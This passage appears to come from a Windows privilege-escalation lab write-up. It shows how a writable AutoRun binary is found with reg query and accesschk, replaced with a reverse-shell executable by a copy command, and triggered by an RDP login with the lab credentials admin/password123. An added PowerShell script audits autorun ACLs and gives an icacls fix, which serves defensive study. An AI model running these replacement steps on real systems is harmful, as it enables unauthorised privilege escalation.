As we can see, there is an AutoRun entry.

Now let's enumerate this manually:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

As we can see, we have program.exe, so let's check its permissions:

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

As we can see, Everyone has read and write access to this file, so let's replace it with a reverse shell:
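The two manual steps above (list the Run key, then check the binary's ACL with accesschk) are exactly what an administrator should audit for across every autorun entry, not just one. The script below is an added example and is not part of the original writeup: it walks the standard HKLM Run/RunOnce keys, resolves each value to the executable it launches, and reports any Allow ACE that gives a low-privileged principal write-type rights on the binary or on its parent folder. The list of "weak" principals and the set of rights treated as write access are my choices for this check; the registry paths are the standard Windows ones.

```powershell
# Added example, not part of the original writeup: audit HKLM Run/RunOnce
# entries and report binaries (or their parent folders) that low-privileged
# principals can modify. Read-only: it only queries the registry and file ACLs.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Principals whose write access to an autorun binary is a finding (my choice).
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a user replace or alter the executable. Modify and
# FullControl both contain WriteData, so the same mask catches them.
# 0x40000000 and 0x10000000 are GENERIC_WRITE and GENERIC_ALL, which
# appear as unmapped raw bits in some ACEs.
$fsr = [System.Security.AccessControl.FileSystemRights]
$writeMask = [int]$fsr::WriteData -bor [int]$fsr::AppendData -bor
             [int]$fsr::Delete -bor [int]$fsr::ChangePermissions -bor
             [int]$fsr::TakeOwnership -bor 0x40000000 -bor 0x10000000

function Get-CommandImagePath {
    # Turn a Run value ("C:\path\app.exe" /flag, or an unquoted path with
    # spaces) into the path of the executable it launches.
    param([string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted: like CreateProcess, try progressively longer space-delimited
    # prefixes until one names an existing file.
    $parts = $cmd -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        foreach ($p in @($candidate, "$candidate.exe")) {
            if (Test-Path -LiteralPath $p -PathType Leaf) { return $p }
        }
    }
    return $null
}

function Get-WeakWriteAces {
    # Return the Allow ACEs on $Path that grant write-type rights to a weak principal.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]$rule.FileSystemRights -band $writeMask) -eq 0) { continue }
        $rule
    }
}

foreach ($key in $runKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    $item = Get-Item -LiteralPath $key
    foreach ($name in $item.GetValueNames()) {
        $command = $item.GetValue($name)
        $image = Get-CommandImagePath -Command $command
        if (-not $image) {
            Write-Warning "$key\$name - could not resolve image for: $command"
            continue
        }
        # Check the file and its folder: write access on the folder lets a user
        # rename the original and drop a replacement with the same name.
        foreach ($target in @($image, (Split-Path -Parent $image))) {
            foreach ($ace in Get-WeakWriteAces -Path $target) {
                [pscustomobject]@{
                    RunKey    = $key
                    ValueName = $name
                    Image     = $image
                    Writable  = $target
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}
```

On the lab machine this prints one row for program.exe with Everyone as the principal, matching what accesschk -wvu showed above; on a clean system it should print nothing. The fix for any row it reports is to reset the ACL so only Administrators and SYSTEM can write, for example icacls "<path>" /inheritance:r /grant:r "Administrators:(F)" "SYSTEM:(F)" "Users:(RX)", and to apply the same to the parent folder.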

copy C:\PrivEsc\esc.exe "C:\Program Files\Autorun Program\program.exe" /Y

Now let's start a new RDP session with the username admin and password password123. Run key entries execute at logon, so the admin logging in launches our replaced binary.

As we can see, we are admin now.